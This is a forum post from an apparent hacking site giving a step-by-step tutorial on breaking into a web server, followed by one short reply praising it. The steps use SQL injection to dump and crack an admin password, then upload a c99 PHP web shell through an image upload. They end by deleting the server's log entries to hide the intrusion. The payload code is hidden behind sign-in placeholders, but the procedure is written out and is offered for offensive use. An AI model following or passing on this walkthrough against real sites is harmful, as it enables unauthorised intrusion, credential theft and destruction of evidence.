dEEpEst Posted October 1, 2016 Share Posted October 1, 2016 Hi All, In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit. What all you need 1. Mantra Security Toolkit >>> http://level23hacktools.com/forum/showthread.php?t=27041 2. A vulnerable website. I'm using a modified version of This is the hidden content, please Sign In or Sign Up 3. Any PHP Shell you are comfortable with - Google for "c99 shell" Now the process Step 1: I'm on the home page of the website now Code: This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up Step 2: I went through all the pages of web site and found a page with URL input Code: This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up Step 3: I launched Hackbar by pressing F9 This is the hidden content, please Sign In or Sign Up Step 4: The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute. Code: This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up Step 6: I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage Code: This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up Step 7: I went up to 7 and no change till now Code: This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up Step 8: I'm on 8 now and I can see the page changed Code: This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up Step 9: Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT This is the hidden content, please Sign In or Sign Up Step 10: I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables This is the hidden content, please Sign In or Sign Up Step 11: Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2 Code: This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up Step 12: I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page Code: This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up The current user is cms_user@localhost Step 13: Lets find out the version of the database. I replaced 2 in the URL with version() command Code: This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up 5.0.45 is the version Step 14: Let me list all the tables Code: This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up From this list I found "user" is an interesting table Step 15: Now I listed all the columns and its a big list Code: This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up Step 16: I want columns from the table "user" and nothing else Code: This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up Step 17: Lets find the user name Code: This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up Step 18: Now, what about password Code: This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up Its encrypted Step 19: Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com This is the hidden content, please Sign In or Sign Up Step 20: Voila.!!! I got the password This is the hidden content, please Sign In or Sign Up Step 21: Finding the log in page. Its was right in front of me This is the hidden content, please Sign In or Sign Up Step 22: Logging in with the credentials I have This is the hidden content, please Sign In or Sign Up Step 23: Greetings.!!! This is the hidden content, please Sign In or Sign Up Step 24: I'm an admin now. Look at my powers. This is the hidden content, please Sign In or Sign Up Step 25: Let me add an event This is the hidden content, please Sign In or Sign Up Step 26: and of course I want to upload a picture This is the hidden content, please Sign In or Sign Up Step 27: Lets see it allows me to upload the shell or not This is the hidden content, please Sign In or Sign Up Step 28: Now I'm pressing on "Add Event" button This is the hidden content, please Sign In or Sign Up Step 29: Nice. Looks like it's got uploaded This is the hidden content, please Sign In or Sign Up Step 30: Let's see where the shell got uploaded to This is the hidden content, please Sign In or Sign Up Step 31: I'm trying to get the default upload location This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up Step 32: Looks like I got it This is the hidden content, please Sign In or Sign Up Let me click on the c9shell.php file I just uploaded Step 33: Voila. I have shell access This is the hidden content, please Sign In or Sign Up Step 34: I simply clicked on the up button to get the root folder This is the hidden content, please Sign In or Sign Up Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial Step 35: What I'm interested is the log folder This is the hidden content, please Sign In or Sign Up Step 36: I clicked on the log.log file and it has the logs of my noisy SQL injection attacks This is the hidden content, please Sign In or Sign Up Step 37: Let me go back and edit the log file This is the hidden content, please Sign In or Sign Up This is the hidden content, please Sign In or Sign Up Step 38: I deleted complete log entries. Now saving it. This is the hidden content, please Sign In or Sign Up Step 39: Nice. Log file is empty now This is the hidden content, please Sign In or Sign Up Step 40: Now. Lets remove the c99 shell by pressing on Self Remove This is the hidden content, please Sign In or Sign Up Step 41: Confirmed.!!! This is the hidden content, please Sign In or Sign Up Step 42: OK. Good Bye C99 This is the hidden content, please Sign In or Sign Up Step 43: Well. It got deleted itself This is the hidden content, please Sign In or Sign Up Link to comment Share on other sites More sharing options...
jiggaman Posted October 27, 2017 Share Posted October 27, 2017 Re: Advanced SQL Injection Tutorial - Complete website rooting this is a total completed real Tuto _ThisL Link to comment Share on other sites More sharing options...
Recommended Posts